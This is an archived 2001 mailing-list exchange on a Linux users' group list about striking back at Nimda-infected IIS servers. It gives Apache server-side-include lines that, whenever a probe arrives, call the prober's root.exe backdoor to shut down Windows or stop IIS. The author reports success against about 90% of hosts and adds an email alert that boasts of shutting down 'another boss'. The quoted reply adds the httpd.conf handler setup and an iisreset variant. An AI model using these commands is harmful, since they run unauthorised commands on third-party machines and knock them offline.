[NTLUG:Discuss] nimba counter attack without PHP?
Paul Ingendorf
pauldy at wantek.net
Wed Sep 19 21:07:26 CDT 2001
If you changes the ssi line to the following
<!--#exec cmd="lynx --source http://$REMOTE_ADDR/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5"--->
You might see some results the url you are grabbing simply stops the IIS service preventing them from further infection which won't stop the virus that's running in the background.
Now if you want to verify it's working pipe something to your e-mail you could try something like the following in the page as well.
<!--#exec cmd="echo 'The site $REMOTE_ADDR was shut down ping to verify.' | mail $SERVER_ADMIN -s 'We shut down another boss'"-->
Then when you get one of these e-mails try to ping the server. 9 out of 10 times it will be down. I haven't figured out yet why the other 10% are still up after something like that but who knows. Maybe for different windows versions you need to change the 5 to a 2 or something of that nature.
-----Original Message-----
From: discuss-admin at ntlug.org [mailto:discuss-admin at ntlug.org]On Behalf
Of Richard Geoffrion
Sent: Wednesday, September 19, 2001 7:53 PM
To: discuss at ntlug.org
Subject: Re: [NTLUG:Discuss] nimba counter attack without PHP?
so then adding
AddType text/html .ida
AddHandler server-parsed .ida
to the httpd.conf file...and including
<!--#exec cmd="lynx -source
http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->
is all I can do?
you know...How do I verify that it is working...because I continue to see
hits to the default.ida file on my webserver that come from the same IP
address. for example
<log snip mode=truncated>
64.232.230.115 - - [30/Aug/2001:13:13:23 -0500] "GET /default.ida?
64.232.230.115 - - [30/Aug/2001:13:29:01 -0500] "GET /default.ida?
</log snip>
So what...did the server reset and 15 minutes later decide to hit me again?
oh what I wouldn't give for an infected Microsoft server so that I could do
some tests. UG.
_______________________________________________
http://www.ntlug.org/mailman/listinfo/discuss
More information about the Discuss
mailing list